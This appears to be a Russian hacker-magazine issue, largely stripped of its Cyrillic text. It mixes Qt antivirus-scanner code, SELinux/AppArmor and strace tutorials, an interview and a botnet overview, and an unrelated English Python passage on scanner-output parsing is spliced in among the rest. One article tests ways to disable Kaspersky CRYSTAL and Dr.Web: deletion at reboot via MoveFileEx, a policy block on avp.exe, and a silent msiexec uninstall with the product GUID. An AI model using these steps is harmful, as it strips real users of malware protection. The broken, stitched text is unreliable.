qDebug() << "[-] Unknown process finished";
return;
}
avsRemains--;
QVirInfo info = parseOutput(av, output);
if ( ! info.isInfo ) {
writeResult(avName, "ERROR");
return;
}
if ( ! info.isInfected )
writeResult(avName, "OK");
else {
writeResult(avName, info.description);
avsFound++;
}
delete sender;
if ( ! avsRemains ) {
qDebug() << endl << endl << "Done,"
<< avsFound << "/" << totalAVs << "found!";
qDebug() << endl << "RankoR, Ax-Soft.Ru, Russia, 2010";
writeFooter();
QCoreApplication::exit();
}

startCheck():
void QAv::startCheck(const QString &fName)
{
qDebug() << "[*] Scanning file";
fileName = fName;
QStringList params;
QAvProcess *process;
// BitDefender
process = createProcess();
params << "--action=ignore"
<< fileName;
process->startProcess("bdscan",
params);
params.clear();
}

fName, , , .

.
, , (const QString &fName)? ,
( , , QString fName)
, ,
(QString fName) . , .
const QString &fName
. (
sizeof(void*)), , .
, ,
. ? ,
,
. , . ,


,
( ).
, , .
, qDebug(). ?
Qt ( ,
).

createProcess(). :
QAvProcess *process = new QAvProcess;
connect(process, SIGNAL(onAvFinished
(QAvProcess*,QString, QString,int)),
this, SLOT(onAvFinished(QAvProcess*,
QString,QString,int)));
return process;

,
onAvFinished() (. )
: avs QMap
typedef QPair<QString, QString > QResultPair;
;
.
parseOutput().
,
. :
QVirInfo info;
info.isInfo = info.isInfected = false;
if ( avName == "bdscan" ) { // BitDefender
if ( output.indexOf("ok") > 0 ) {
info.isInfo = true;
return info;
}
int index = output.indexOf("infected:");
if ( index == -1 )
return info;
info.description = output.mid(index + 9,
output.indexOf("\n", index) - index - 9).trimmed();
info.isInfo = info.isInfected = true;
}
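parseOutput() above decides "clean" as soon as the whole buffer contains "ok" anywhere, so a sample living under a path such as /home/brook/ would be reported clean even when the scanner printed infected:. The Python below is an added example, not the article's Qt code: it keeps the page's logic as naive_parse() for comparison and matches the verdict token per line instead. The exact bdscan line layout is not on the page, so the format assumed here (path, two or more spaces, then ok or infected: name) and the sample output are constructed.

```python
"""Per-line scanner verdict parsing, versus the substring test above."""
import re
from dataclasses import dataclass


@dataclass
class VirInfo:
    is_info: bool            # a verdict for the file was found at all
    is_infected: bool
    description: str = ""


# Assumed (constructed) layout: "<path>  ok" or "<path>  infected: <name>",
# path and verdict separated by two or more spaces, summary lines afterwards.
LINE_RE = re.compile(r"^(?P<path>\S.*?)\s{2,}(?P<verdict>ok|infected:\s*(?P<name>\S.*))$")


def naive_parse(output: str) -> VirInfo:
    """The page's parseOutput() logic, kept for comparison: "ok" anywhere in
    the buffer means clean, otherwise take the text after "infected:"."""
    if output.find("ok") > 0:
        return VirInfo(True, False)
    i = output.find("infected:")
    if i == -1:
        return VirInfo(False, False)
    end = output.find("\n", i)
    return VirInfo(True, True, output[i + 9:end if end != -1 else None].strip())


def parse_scan_output(output: str) -> dict:
    """Map each scanned path to its verdict, matching the token per line."""
    results = {}
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # banner, blank or summary line
        if m.group("verdict") == "ok":
            results[m.group("path")] = VirInfo(True, False)
        else:
            results[m.group("path")] = VirInfo(True, True, m.group("name").strip())
    return results


def verdict_for(output: str, path: str) -> VirInfo:
    return parse_scan_output(output).get(path, VirInfo(False, False))


# Constructed sample: the path contains "ok" inside "brook"
SAMPLE_OUTPUT = (
    "/srv/samples/brook/invoice.exe  infected: Trojan.Generic.1234\n"
    "/srv/samples/clean.txt  ok\n"
    "\n"
    "Results:\n"
    "Files: 2\n"
    "Infected files: 1\n"
)

if __name__ == "__main__":
    print("naive:", naive_parse(SAMPLE_OUTPUT))
    print("strict:", verdict_for(SAMPLE_OUTPUT, "/srv/samples/brook/invoice.exe"))
```

The rule generalises to every engine wired into the scanner: key the verdict on the file name you passed in, and treat a missing verdict line as "no information" (the ERROR result above) rather than as clean.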

.
- , . , ( , )
. .
onAvFinished().
HTML- .
! . : ? , :
1. .
. 1 1 . ?
Iptables !
2.. /
/ .
3. .

, . PHP! C++ PHP + Ajax ,


Ajax- Sajax, SQL- SQLite .

. . , :)..z

MALWARE
deeonis deeonis@gmail.com

INSIDE

AV-:
!

?
, ,
... ,
. -.
,
.
. Kaspersky CRYSTAL.
. ,

,
, ,
,


. Dr.Web Security
Space Pro. .
, .

-
.
,

Kaspersky

.



. ,


. !

. , .

- .
. ,
API-.
,
, ,
. , ,
,
, API-
.
,
Windows
. ,
. ,

, .
, ,
, -.

Windows. , Windows XP Professional SP3.



.
, , ,

. ,
.
.
, -,
.

.

,
.
, .
- . ,

. ,
. MoveFileEx,
.
, , ,
. ,
NULL
,
MOVEFILE_DELAY_UNTIL_REBOOT,
.
. , .
. ,
. Kaspersky
CRYSTAL. ,
, avp.exe.
,




MALWARE



MOVEFILE_DELAY_UNTIL_REBOOT MoveFileEx
,
.
(
),
.
: . ,
. .
,
. ,
, :
DWORD pseudoRandomDigit(const DWORD digit)
{
fopen("dsjklfjsdlk", "r");
DWORD err = ::GetLastError();
return digit + err;
}

pseudoRandomDigit .
,
.
,
, - . , , ,
- .

. ,
%programfiles%\Kaspersky Lab\Kaspersky CRYSTAL\.
,
,
.
, ,
. -
, .
.
avp.exe -
.
, Kaspersky CRYSTAL , , , .
, .
Dr.Web Security Space Pro.
CRYSTAL, exe-, .
, , , dwengine.exe.
, . , .
! ,
- , ,
.

,
. , .
:).


2
- , . .
,
. .
,
.
Kaspersky CRYSTAL. avp.exe, .
. ,
. , ,
Kaspersky . :
.
Dr.Web .
- , ,
. license.txt! .

3

, . , , , MoveFileEx
MOVEFILE_DELAY_UNTIL_REBOOT.
,
(. ).
Kaspersky CRYSTAL
. , , . ,
? , ... .
. , avp.exe . .
CRYSTAL
. : , . Dr.Web?
, , ? , .
, .
. - ,

.
. ,
. .

4

Windows XP Professional.
... : gpedit.
msc. .
User Configuration, Administrative Templates, System.
Don't run specified Windows applications.
.
avp.exe.
Windows,
. Kaspersky CRYSTAL
, .
, . , . !
Dr.Web . dwengine.
exe ,
, .
SpIDer Guard.
- .
, .


.
:)
,
, , , , ,
. .

5
. ,
.
,
.
.
Kaspersky CRYSTAL
: msiexec /quiet /
uninstall {1A59064A-12A9-469F-99F6-04BF118DBCFF}.
/quiet ,
, . .
,
, .

.
.
Dr.Web , , .
msiexec

.

1
2
3
4
5


. .
. ,
, ,
,
. ,
, . Dr.Web
, .

. .
, . Kaspersky
CRYSTAL, Dr.Web Security Space Pro
.
,
.z

KASPERSKY CRYSTAL VS DR.WEB


SECURITY SPACE PRO
:
. Windows.
.
. MoveFileEx MOVEFILE_DELAY_UNTIL_REBOOT.
-: Kaspersky CRYSTAL 3.6 , Dr.Web Security
Space Pro 4.4 .

KASPERSKY CRYSTAL
3
3
2
5
5
3.6

DR.WEB SECURITY SPACE PRO


5
5
5
4
3
4.4


Mifrill mifrill@real.xakep.ru

IT-

,
. ,
,

.
, ,
,
,
- , , ,
, , .
,
? ? .
,
,
,
IT-,

. ,
, , ,
. , ,
,
.
, ,
how to, ,
.
,
,
,
IT- . ,
,



Discovery :).

,
:
? , ,
, ,
, . ,
,
, ,
. , ,
, .
, , , ,
( hh.ru

).
,
, ,
, .
:
, ; ,

.

, ,
,
, .
, , ,
.
, , ,


, (http://forum.awd.
ru/),
.
, ,
, ,
, . ? . ,
:

. , ,
, .
, ,

. , :).
.
, , .
,
, ,

.
: , ,

IT-.
, ,
, ,
. ,

. , ,
,

?
, :
?. :
, .
IT-.

, , . , , .
.
/.
IT-.
, , . , -
, - ,
, (
, ).

:
?!.

, , , IT-
.

; ,

,
, , ,
. ,
, -

, .
,
,
,
,
.

.
,
. ,
HardnSoft ,
,
:


( , ,
). ,
, -.


HardnSoft.
,
.

:).
, 28 2009
( ) .
. 40


,
.
: , , , ,
. , (
).
20
, $185,
.
$300$500, ,
. $30
.
. $200
, .
,
.

, , ,
.
,
$350.
. ,
.
,
, -
:).
, ,
.
.
, , .
-


$70-$100 .
.
, .
.
, ,
$500-$700 .
,
, .
, , 53 ,
. ,

.
IT- ,

( ,
).
-
(
), -,
, ;
60% .

, , , -, , ,
. ,

,
, - , ,
, - IT,
.
,
,
, ,
,
,
. , ,
, ,
- SEO-
:).

,
,
, ,
, .
IT-
, ,
,
,
, .

, ,
45 ,
.
, , , ,


( ).
IT- ,
, .
, IT-, ,
, .
, ,

,

, , ,
.
45

, , ,
.

.
, 3-5
IT-,
- . ,
, ,
, . ,
,
( ), ,
.
, ,
,
, ,
.
,
Tier 1,

),

.
, .
-
. , -
800-1000 ,
500 .

.
,
,
- .
, ,
,
(
). ,

.
,

,
, ,
,

. , Tier
1
IELTS
, (Masters
Degree),
.
UK
90 . ,
( NARIC ),
90 , ,
,
.
(
,
500-700 (24-33 . ) ,
100
), , ,
.

, (
,
).

20%,
,
IT, , - .
,
, (
,


, , , EU.
, , ,

. .


,
.
,
. ,
, , :
800-1000 ;

300 . ,
.

,

, .
,
,
:

, - .

IT-, ,
.

,

.
(
), ,
.
, , , , ,
IT-
- :).

- 5000 .


, , , ,
.
, , : ,
,

- .
McAfee
senior reverse engineer.
, ,
.
Mifrill (M): ? , ?
(..): .
,
,
- - .
, ,
.
,
,
.
.: , ,
, ,
. ?
..:
,
. , sensepost.com. ,
, ,
. .
.: , ?
,
,
,
?
..: , , ,
, . ,
, , .


, ,

(, , , ).
- ,
,
,
. , -
. ,
.

,
$800
. Endeavor Security.
, ,
?
, ,
, .
. - ,
, 2008 .

, ,
, McAfee
. 2009 ,
.

.:
.
, , , ?

.: , ,
, ,
, , ?

..: , ,
, ,
.
. ,
,
.
, ,

, . , ,
6 -

..:
,
.
12 , 4,
.
, , ,
. ,

, ,
. ,

..:
( -
) . ,
, ,
, ,
.
,
. ,
Apple, .
, -. , ,

, McAfee,
, iDefence.
,
, .

.: , .
( ,
)?

,
, ,
.
Macrovision,
: , ,
.
, .
: :).

,
, ?
..: ,
. ?
? , ,
. ,
-,
.
, ...
, .
,
$5 ,
. -



- ,
- .
, ,
,
. , .
, .
,
. ,

.
.: , McAfee.
, ?
..: 2009 Endeavor Security, , McAfee,
,
. ,
,

... , -
, ,
- ( 10 . 5 , ),
.
, ,
.
, ,
, ,
, .
,
.
. , 10 000
. , [censored].
.: -
?


.
, ,

.
, .

.: , ,
. , , , , ,
, ? ,
.


..: , . ,
Google Aurora.
. ,
, , -,
. , ,
... ,
, .
.
.: ?
..: ,
. ,
. ,

, , , ...
,
, , . (Asus eee, , )

:).
.: ,
,
?
..: , , McAfee
. , .
.: , ?..


.
,

:). , .

,
.
.: , ,
, ,
.
?
..: , ,
, :).
5-
, , 1/4
. .

..: , .
( ),
, , , , .
, , ,

i94, ,

. ,
,
. , , ,
.
, i94 .
6 ,
, .

..: ?
, ,
(
!). $2000
,
,
.
, , .
, .
, ID,
.
.
... -,
,
$500
, $10 000
. , . , ,
:)

: 100
,
, , , . ... , ,
256 $20 ,
.
,
- ,
.
15 ,
.
: ,
, .
- , .
.
,
, .
. ?
,
, .
P.S.
O-1A,
,
! z


UNIXOID
bober zloy.bobr@gmail.com


Linux
Unix, ,
(ugo),
.
, , -
,
. - .

,
- .


, ,
, .
Unix , -
.

(Discretionary Access Control DAC),


.
,

, .
DAC

SELinux
, , , ,

.
.
, DAC :
;
. Linux
,
MAC (Mandatory Access Control, ).
,
,
. MAC , DAC, Unix, ,
,
.
, Unix
. ,
.
:

. ,
, -
,
. ,
, .
,

. Linux :
SELinux RedHat , AppArmor Ubuntu.
2.6.30
TOMOYO Linux (tomoyo.sf.jp),
, .
, .

SELINUX
SELinux (Security Enhanced Linux, selinuxproject.
org) U.S. NSA (National Security Agency),

Linux ,
-, . 2000 ,
: -
, ?

SELinux Administration
GNU
GPL 2.6., FreeBSD OpenSolaris.
MAC ,
.
SELinux - Role-Based Access Control (RBAC),
. SELinux Type Enforcement
(TE) ,
, .
, , , ,
, , ,
(
). SELinux (MLS, Multi-Level Security model),
, ,
,
.
, SELinux
,
. ,
. (, , , .)
, .
, SELinux ,
.
,
- .
,
Extended attributes
.
.
, .
, .
SELinux ( semanage),
UID Linux
(uid), .
SELinux ,
Linux
SELinux.

SELinux selinuxproject.
org

TOMOYO Linux
tomoyo.sf.jp





LIDS, GRSecurity RSBAC


, , , Linux-
LIDS (Linux Intrusion Detection System, lids.org), GRSecurity
(grsecurity.org) RSBAC (Rule Set Based Access Control, www.rsbac.
org). .
LIDS MAC, . TPE (Trusted
Path Execution) TDE (Trusted Domain Enforcement)
, , .
, .
- .
# lidsconf -A -o /sbin -j READONLY

GRSecurity , MAC/ACL, chroot,


TCP ISN PID,
RBAC, ,
PaX ( ).
, gradm ACL.
RSBAC,
, 2000 . , ,
.
(GFAC,
Generalized Framework for Access Control). root ,
.
: Linux
DAC, , JAIL, PaX,
Dazuko, Linux .
, .

AppArmor
# ps aux | grep syslogd
root 2729 0.0 0.0 5908 624 ? Ss 07:30 0:00 syslogd -m 0
# cat /proc/2729/attr/current
system_u:system_r:syslogd_t:s0

SELinux disable (),


enforcing ( , , ), permissive ( ,
avc: denied, ).
, , , ,
/selinux:
$ cat /selinux/enforce

1, , SELinux .
, 0 1:
# echo 0 > /selinux/enforce

su SELinux. root .
:
$ id -Z
user_u:user_t:unconfined_t

:
$ su
# id -Z
user_u:user_t:unconfined_t

, :
# id -Z
root:system_r:unconfined_t:SystemLow-SystemHigh

setenforce [ Enforcing |
Permissive | 1 | 0 ].
, /etc. , RedHat,
SELinux Administration Tool (system-configselinux, policycoreutils-gui). ,
/etc/sysconfig/selinux ( /etc/selinux/
config). , SELINUX:
SELINUX=enforcing|permissive|disabled

SELinux
, : dhcpd, httpd, named, nscd, ntpd,
portmap, snmpd, squid syslogd. unconfined_t. ,
SELINUXTYPE strict:
SELINUXTYPE=targeted|strict

newrole. SELinux .
, :
# ls --context /
# ps -ax -Z

, /proc:


/etc/selinux/targeted/contexts .
, root :
# cat /etc/selinux/targeted/contexts/users/root
system_r:unconfined_t:s0 system_r:unconfined_t:s0
system_r:initrc_t:s0 system_r:unconfined_t:s0

SELinux : setools policycoreutils, policycoreutils-newrole. ,


, , . , newrole,
,
policycoreutils.
targened,
selinux-policy*.
selinux-policy-devel.
200 , ,
.
audit2allow ( policycoreutils),
SELinux.

APPARMOR

AppArmor

Skype
,
Skype. (. Skype: , www.xakep.ru/post/38543/default.
asp). .
, ,
, . , , : www.cynapses.org/tmp/apparmor/
usr.bin.skype.
apparmor-profiles.
.
aa-genprof ( genprof). :
$ sudo aa-genprof /usr/bin/skype

: , , , .
/etc/apparmor.d/usr.bin.skype.
AppArmor enforce-:
$ sudo aa-enforce skype

AppArmor .

, httpd,
:
# grep -iR httpd /etc/selinux/targeted/contexts

, .
SELinux: getsebool -a.
setsebool ( '-P'
) system-configsecuritylevel.
sestatus -v .
:
# dmesg | grep -i selinux
SELinux: Initializing.
SELinux: Starting in permissive mode
# grep -iR selinux /var/log/messages

Application Armor Immunix Inc.


, Novell ,
GNU GPL,
openSUSE. AppArmor .
Immunix Novell,
. openSUSE AppArmor
, SELinux.
- AppArmor is dead,
,
,
.
Canonical, AppArmor. ,
, .
, ,
initramfs. Ubuntu AppArmor
LSM (Linux Security Modules), security_path
vfs.
AppArmor ,
. SELinux, AppArmor
.
(profiles),
,
. . :
SELinux , AppArmor , . ,
, ,
. . ,
SELinux
, AppArmor .

, AppArmor
, . ,
aa-genprof aa-logprof, . AppArmor init-, , securityfs.
$ sudo /etc/init.d/apparmor start

,
/sys/kernel/security/apparmor/profiles ( /etc/init.d/
apparmor status); Server/
Desktop .
( ) /etc/
apparmor.d ,
. .
. AppArmor
enforce-. , .


TOMOYO Linux
complain,
. , SELinux,
, AppArmor
.
:
flags=(complain);
complain _ ( enforce);
echo 1 > /sys/kernel/security/apparmor/
control/complain.
, , ,
. , AppArmor , .

(apt-cache search apparmor), , -
apparmor.opensuse.org.
, 2.4/2.6 Trustees (trustees.
sf.net), ACL a- Novell Netware,

. ,
, SELinux AppArmor.

TOMOYO LINUX
TOMOYO Linux (tomoyo.sf.jp) 2003 NTT DATA CORPORATION MAC Linu. GNU GPL
SF.net.
. 2.6.30,
TOMOYO Linux ,
.
TOMOYO Linux. ,

TOMOYO Linux

2.4 2.6. ( )
LSM, 1.: , ,
POSIX- ( ).

,
Mandriva. ,
Tomoyo GUI,
.

. , Ubuntu 10.04:
$ echo 'deb http://osdn.dl.sourceforge.jp/tomoyo/47128/ ./' | sudo tee -a /etc/apt/sources.list
$ sudo apt-get update
$ sudo apt-get install linux-ccs ccs-tools

, Enable
different security models TOMOYO Linux Support Security
options.
TOMOYO AppArmor. (pathname based), .
. , TOMOYO
, . , , SSH, ,
. , , (UID/GUD).
TOMOYO (domains).
TOMOYO /etc/tomoyo,
/proc/tomoyo,
. TOMOYO /etc/tomoyo/profile.conf /proc/tomoyo/profile.
TOMOYO disable, permissive,
enforsing learning (, ).
:
manager.conf (/proc/tomoyo/manager) ,
/proc/tomoyo;
exception_policy.conf (/proc/tomoyo/exception_policy)
;
domain_policy.conf (/proc/tomoyo/domain_policy) ;
meminfo.conf (/proc/tomoyo/meminfo)
.
ccs-tools
TOMOYO, /usr/lib/ccs/tomoyo_init_police.sh,
. .
:
# /usr/lib/ccs/editpolicy /etc/tomoyo/

TOMOYO
SELinux AppArmor.z


UNIXOID
zobni n@gmail.com

Linux

Linux .
, ,
, 500 ,
,
. ,
, ,
? .
(,
GTK+ 2.X, X Free 4.X
Linux 2.6)
.
,
.
-


, .

PRELINK
- ,

. ?



. a.out,
.
a.out , ,


update-initramfs

prelink
Ubuntu
.

,
DT_GNU_HASH


(glibc).

Readahead bootchart
, .. ,
, ,
(,
?). ,
ELF (
:)),


.
, (,
, ..)
.
ELF UNIX/Linux
, ,
, .
.
,
, ,
,

50 ,
( ).
- ELF- a.out.
,
, ,

.
-
Red Hat Jakub Jelinek 2004
. , , 50%
,
(OpenOffice, KDE, Gnome) .

.
, - . Jakub Jelinek
prelink.
Linux-,
.
prelink, ,
:
# prelink -avmR

:
v ;
a -
;
m (,
);
R (
).


.
:
1. Prelink , '-fPIC'. ,
, ;
2. Prelink wine,
Windows- ;
3.
prelink;
4. .
prelink :
# prelink -au

PRELOAD
prelink preload,
. ,
preload
.

,
.
preload , ,

. , preload


prelink
Mac OS X.

prebinding.
preload
Windows
Prefetcher
( SuperFetch) ,
Windows XP.

init,
Ubuntu


upstart,

15-20
.
cryopid.berlios.de

CryoPID.
people.redhat.com/
jakub/prelink.pdf
Prelink
.
behdad.org/preload.
pdf Preload .
www.checkpointing.
org
.
dmtcp.sourceforge.net


, .
preload ,

:
$ sudo apt-get install preload

/etc/preload.
conf. ,
-,
, , preload .
model:
cycle .
20 .
, , preload , .
halflife , preload
50%.
168 (). ,
, , /
.
minsize (, ), preload. 2 000 000
( 2 ), preload .
, ,
.
memtotal, memfree, memcached
preload . : ( memtotal) +
(, memfree) + ( memcached).
system :
mapprefix , ( , , ).
exeprefix .
sortstrategy -.
3 ( ).
1, 2.
, preload:
$ sudo /etc/init.d/preload reload

, preload ,
/val/log/preload.log.
preload /var/lib/preload/preload.state.

READAHEAD
Ubuntu, Linux,
readahead .
preload, readahead
.
, readahead
Linux .
/sbin/readahead-list,
/etc/readahead/boot /etc/readahead/desktop . , , , .
, Ubuntu
. . profile .



Preload
, <Esc>
, <e>
profile. <b> . , .

CRYOPID
.
, jabber- .
, .
,
,
,
? , . CryoPID
.
root , x86
amd64 , ,
. -
,
. CryoPID
, :
$ cd /tmp
$ wget http://dagobah.ucc.asn.au/wacky/cryopid-0.5.9.1i386.tar.gz
$ tar -xzf cryopid-0.5.9.1-i386.tar.gz
$ cd cryopid-0.5.9.1/src
$ make
$ mkdir ~/bin
$ cp freeze ~/bin

:
$ ~/bin/freeze - pid-

, CryoPID ,
X-,
.

UBUNTU
Ubuntu , . BSD-. ,
.

OpenOffice.org

Ubuntu
1. grub. 3 ,
.
/boot/grub/menu.lst, timeout=3 3 0.
2. splash. Ubuntu splash-screen,
, .
/boot/grub/menu.lst
quiet splash .
3. IPv6. IPv6
Linux ,
/etc/
modprobe.d/aliases. IPv6 ,
ipv6.disable=1. , /boot/grub/menu.lst.
4. .
,
(suspend) . , ,
noresume . , .
5. initramfs. RAM- ,
.
,
. ,
.
/etc/initramfs-tools/initramfs.conf, MODULES=most
MODULES=dep.
:
$ sudo update-initramfs -k all -u

.
6. . Ubuntu
.
, . System Administration
Services .
, :
Bluetooth Manager Bluetooth
Check for new hardware drivers


Evolution Alarm Notifier


Evolution
Print Queue Applet
Tracker

7. .
( ). ,
System Preferences Applications startup
, (,
bluetooth).
:
, :
sh -c "sleep 10; exec bluetooth-applet"
sh -c "sleep 20; exec /usr/lib/evolution/2.28/
evolution-alarm-notify"


10. DE .


, ,
.
, . .
OpenOffice.org.
,
. Tools Options,
Memory. Number of
steps 20, .
Graphics cache Use for OpenOffice.
org 128, Memory per object 20. Java
Use a Java runtime environment.
.
Firefox.
. ,
,
.
. , . sqlite,
:
$ find ~/.mozilla/firefox/ -name '*.sqlite' -exec sqlite3 {} VACUUM \;

(, ),
.z


UNIXOID
Adept adeptg@gmail.com


strace
: ,
.
. ! ,
, .
, ,
,
-.


strace. ,
#10 2009 ( ), , strace
-


, ,
. Strace
:

- ;
-

- ;
strace
, tcpdump,
;
( /dev/random /dev/


Firefox 1

strace Firefox
audit) strace ;
,
. , , AppArmor
chroot.
strace :
$ strace uname
execve("/bin/uname", ["uname"], [/* 36 vars */]) = 0
brk(0) = 0x1ed2000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb79f08a000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=133660, ...}) = 0

### , /usr/lib/locale/ru_RU.utf8
uname({sys="Linux", node="adept-laptop", ...}) = 0

strace stderr,
. strace
'-o':

access:
.
(
F_OK).
-1 () ENOENT
(No such file or directory). ,

.
, access
, -
.
open,
(O_RDONLY, O_WRONLY O_RDWR).

, ( ,
close).
open
read write.
,
/ .
fstat
( inode, uid, gid ..)
uname, .
uname ,
.
. . , open access (

):
$ strace -e trace=open,access \
-o strace.log uname


, : file, process, network, signal
ipc. , .
, mmap:
$ strace -e trace=\!mmap -o strace.log uname

$ strace -o uname.strace uname

execve: .
( ) , . strace
,
'-v'. 0 ok.
-1.

,
.
.
strace ,
'-f'.
strace ,
'-ff', strace
filename.PID.



ldd



. ,
, :
www.catonmat.net/
blog/ldd-arbitrarycode-execution/.


readelf.

strace.sourceforge.
net
www.ltrace.org
github.com/rvoicilas/
inotify-tools




.
Linux
2.6 400
.




man. ,

open
: man
2 open.
strace


ptrace.

ltrace.


Inotify:

strace ,
.
. inotify. Inotify ,
.
2.6.13 ( 2005). Inotify , , ( Beagle),
, incron.
Incron cron , , .
(incron ) /etc/incron.allow,
,
incron.
:
$ incrontab -e

:
<> <> <> (
)

IN_ACCESS
IN_ATTRIB /
IN_MODIFY
IN_CREATE
IN_DELETE
IN_DELETE_SELF

IN_MOVE
IN_ALL_EVENTS

. :
$@ /
$# ,
( )
$%

strace:
'-p' PID
. , '-p' .
apache:
# strace -f $(pidof apache2 | sed 's/\([0-9]*\)/-p \1/g')

strace,
,
.


-, 1.3, PHP 4,
.


OpenOffice
PHP mail . ,
. apache,
PHP sendmail , ,


Strace ( system trace) , BSD- . 1991
SunOS trace. Linux
, . 1992 2.5 SunOS, Linux
1.5. 1993 strace 2.5 SunOS strace Linux,
truss SVR4.
strace, Linux, SunOS. 1994
strace SVR4 Solaris, 1995 Irix. strace ,
.
4.5.20 14 2010 . strace ,
.

, strace
DTrace Sun Microsystems, Solaris, FreeBSD
Mac OS X (10.5 ). Linux.
ktrace FreeBSD, OpenBSD, NetBSD Mac OS X (
10.5).

Inotify-tools
Incron , inotify
inotify-tools, inotifywait inotifywatch,
. Inotifywait

.
man', inotifywait:
$ cat ~/script.sh
while inotifywait -e modify \
/var/log/apache2/error.log; do
tail -1 /var/log/apache2/error.log | \
notify-send "Apache needs love!"
done

Inotifywatch /
.
,
.

ldd Firefox

. strace. :

, Firefox

# strace -f -o /tmp/apache2.strace \
/etc/init.d/apache2 start

, ( mail.
php) , apache ,
.
$ grep mail.php /tmp/apache2.strace
5345 read(9, "GET /mail.php HTTP/1.1\r\nHost: 12"..., 8000) = 397
5345 stat("/var/www/mail.php", {st_mode=S_IFREG|0644, st_size=256, ...}) = 0
5345 lstat("/var/www/mail.php", {st_mode=S_IFREG|0644, st_size=256, ...}) = 0
5345 open("/var/www/mail.php", O_RDONLY) = 10

PID, , , .
,
. , grep mail.php , PID- (5345), . ,
grep PID:
$ grep 5345 /tmp/apache2.strace
5340 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f3bf2eada10) = 5345

5345 read(9, "GET /mail.php HTTP/1.1\r\nHost: 12"..., 8000) = 397
5345 stat("/var/www/mail.php", {st_mode=S_IFREG|0644, st_size=256, ...}) = 0

5345 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f3bf2eada10) = 5347

.
clone
PID 5347. , ! :) Grep 5347:
$ grep 5347 /tmp/apache2.strace

5345 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f3bf2eada10) = 5347

5347 execve("/bin/sh", ["sh", "-c", "/usr/sbin/sendmail -t -i "], [/* 6 vars */]) = -1 EACCES (Permission denied)

! /usr/sbin/sendmail,
. sendmail
, /bin/sh . -
, /bin/sh 770 (
root), www-data ( apache)
.
.


strace ,
tcpdump. , strace ,
.
IP , , ,
dig IP, firefox
. :
$ strace -f -e trace=network firefox xakep.ru
7879 socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
7879 connect(3, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = 0
7879 sendto(3, "\2\0\0\0\v\0\0\0\7\0\0\0passwd\0", 19, MSG_NOSIGNAL, NULL, 0) = 19

connect , Firefox NSCD ( ) ,


, NSCD DNS.


# ldd /usr/local/nginx/sbin/nginx
linux-gate.so.1 => (0xb7789000)
libcrypt.so.1 => /lib/i686/cmov/libcrypt.so.1 (0xb7751000)
libpcre.so.3 => /usr/lib/libpcre.so.3 (0xb7728000)
libssl.so.0.9.8 => /usr/lib/i686/cmov/libssl.so.0.9.8 (0xb75d4000)
libcrypto.so.0.9.8 => /usr/lib/i686/cmov/libcrypto.so.0.9.8 (0xb7cde000)
libz.so.1 => /usr/lib/libz.so.1 (0xb75bf000)
libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7464000)
libdl.so.2 => /lib/i686/cmov/libdl.so.2 (0xb7460000)
/lib/ld-linux.so.2 (0xb778a000)

chroot-
(, /chroot/nginx). , ,
, ldd
.
nginx' .
:

Firefox

NSCD , , .


, - ,
kill. , , , . :
Debian Etch, squid NCSA SAMS . SAMS squid
.
# strace -f -o /tmp/samsdaemon /etc/init.d/samsd start

15773 13:16:03 stat64("/etc/squid/ncsa.sams", {st_mode=S_IFREG|0644, st_size=314, ...}) = 0
15773 13:16:03 open("/etc/squid/ncsa.sams", O_RDONLY|O_APPEND|O_LARGEFILE) = 3
15773 13:16:03 close(3) = 0
15773 13:16:03 open("/dev/random", O_RDONLY) = 3
15773 13:16:03 read(3,

, .
, /dev/random. SAMS
. /dev/urandom, , /dev/random.

NGINX
,
.

chroot.
, strace
ldd ( ELF). , chroot
- nginx.
, nginx (
0.8.40)
/usr/local. , :


# strace -e trace=open /usr/local/nginx/sbin/nginx

open("/etc/ld.so.cache", O_RDONLY) = 3
open("/lib/i686/cmov/libcrypt.so.1", O_RDONLY) = 3
open("/usr/lib/libpcre.so.3", O_RDONLY) = 3
open("/usr/lib/i686/cmov/libssl.so.0.9.8", O_RDONLY) = 3
open("/usr/lib/i686/cmov/libcrypto.so.0.9.8", O_RDONLY) = 3

open("/etc/passwd", O_RDONLY|O_CLOEXEC) = 4
open("/etc/group", O_RDONLY|O_CLOEXEC) = 4
open("/usr/local/nginx/logs/access.log", O_WRONLY|O_CREAT|O_APPEND|O_LARGEFILE, 0644) = 4
open("/usr/local/nginx/logs/error.log", O_WRONLY|O_CREAT|O_APPEND|O_LARGEFILE, 0644) = 5

,
(, /etc/
passwd).
chroot- /dev/null, nginx':
# mknod /chroot/nginx/dev/null c 1 3

. nginx chroot :
# chroot /chroot/nginx/ /usr/local/nginx/sbin/nginx

strace . -,
,
( apache production ) .
32-
64- . , ,
,
( , , ).
, strace ,
.
, , gdb.z

CODING
c0n Difesa condifesa@gmail.com, http://defec.ru


-
. -

.

DDoS-,
.

? , -
, TAN (Transaction authentication number,
-), .
-.
,
, .
- ,
. -
.
, .
.
. , ,
-. . , , .


. -.
:
- -.
(,
Zeus).
Instant Message
IM- (ICQ, jabber, MSN ..). -
.


IRC IRC-.
.
-
() .
Twitter-
-. ,
-, API. , ,
- ,

.
TCP/IP-based ,
TCP/IP. ,
.

( ):
(
);
P2P ( ).

, .

. , , /
,
.
-
:
(
,
);

Bot
Master

Bot
Bot


(
, ).


-. , , - , :
1) Peer-to-peer .
, ( )
IP ,
;
2)
,
;
3)
(P2P) , , ;
4) ( /
).

P2P- . ,
.
,
,
, ,
- .
.

,
-
, ,
.
, :

#include <stdio.h>
#include <stdlib.h>
#include <conio.h>

int generator (int seed) {
    int x;
    srand(seed);
    /* print the first twenty values of the sequence selected by this seed */
    for (x = 1; x <= 20; x++)
        printf("iteration %d, rand=%d\n", x, rand());
